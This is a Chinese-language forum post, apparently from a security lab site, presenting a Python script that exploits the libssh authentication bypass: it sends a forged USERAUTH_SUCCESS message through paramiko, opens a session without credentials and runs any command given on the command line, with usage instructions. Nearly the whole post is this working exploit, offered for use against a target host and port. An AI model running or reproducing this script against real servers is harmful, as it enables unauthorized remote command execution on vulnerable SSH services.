搜索
查看: 2566|回复: 0

VULNSPYBlOGQQ 群TELEGRAM GROUPYOUTUBE CHANNEL Libssh 登录绕过漏洞利用 (CVE-20...

[复制链接]

674

主题

981

帖子

2485

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2485

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-1-14 00:30:26 | 显示全部楼层 |阅读模式

漏洞利用
脚本使用方法:
 python vulnspy_libssh.py target.com 端口 '命令'



测试脚本:
 #!/usr/bin/env python
import paramiko
import socket
import argparse
import logging
import sys
import time
import datetime

def BypasslibSSHwithoutcredentials(hostname, port, cmd):
    sock = socket.socket()
    try:
        #logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
        sock.connect((str(hostname), int(port)))
        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
        # ref:[zxsq-anti-bbcode-url]http://joelinoff.com/blog/?p=905[zxsq-anti-bbcode-/url]
        session = transport.open_session()
        session.exec_command(cmd)
        data = ''
        maxseconds = 5
        start = datetime.datetime.now()
        start_secs = time.mktime(start.timetuple())
        while True:
                if session.recv_ready():
                    data = data+session.recv(2048)
                if session.exit_status_ready():
                    break
                now = datetime.datetime.now()
                now_secs = time.mktime(now.timetuple())
                et_secs = now_secs - start_secs
                if et_secs > maxseconds:
                    data = data+'\ntimeout'
                    break
        print data
        return 0

    except paramiko.SSHException as e:
        print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
        return 1
    except socket.error:
        print("Unable to connect.")
        return 1

def main():
    try:
        hostname = sys.argv[zxsq-anti-bbcode-1]
        port = sys.argv[zxsq-anti-bbcode-2]
        cmd = sys.argv[zxsq-anti-bbcode-3]
    except:
        print("Usage: python vulnspy_libssh.py target.vsplate.me 2222 'curl [zxsq-anti-bbcode-url]www.vulnspy.com[zxsq-anti-bbcode-/url]'")
        exit(1)
    BypasslibSSHwithoutcredentials(hostname, port, cmd)

if __name__ == '__main__':
    exit(main())

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表